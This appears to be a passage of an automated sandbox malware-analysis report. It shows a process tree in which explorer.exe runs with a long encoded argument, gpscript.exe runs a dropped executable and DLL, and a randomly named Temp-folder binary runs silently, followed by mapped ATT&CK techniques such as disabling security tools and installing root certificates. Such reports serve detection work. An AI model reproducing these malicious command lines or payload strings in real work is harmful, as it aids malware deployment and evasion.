C:\Windows\explorer.exe bqolgaggpbwmexx0 6E3sjfZq2rJQaxvLPmXgsCZAIMpmPntHEIWDH08V2Q38oDzy/Cqli7gBy2CefOtpbDvXGR4glPHek2nDkDQAVV/YxKxdt9bbVNHKfcSH/EJYtaySlAyCqJ7h97nhbXSjqD4Ok41Gq3Klge2pYVnV7Q8XpeVQM0cmbp9X4u8VrOQ6nHXt/Mic+XgY1+rzfSckHm5QSoKLVon/NUc3ECYCbDxjzLsuy4EPZh8t/tiXxeQk5SxDm2JJDS+9uYI46CRm2Dbbac+TA/HjhXxoqovZMJHpjwU9IVCv0+m8YWp+D+DqFTTcT2UkYTsWpvt+GKkxP9aPtghph1/KQtGcU5s/n4Y3q3wEWQay1rNS0x9a+34yU7TYlVgV6pKLCkgMrTtZ
3⤵
PID:1596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3276

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3508

C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\UzrKuwT.exe
C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\UzrKuwT.exe Qa /site_id 525403 /S
1⤵
PID:2104

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery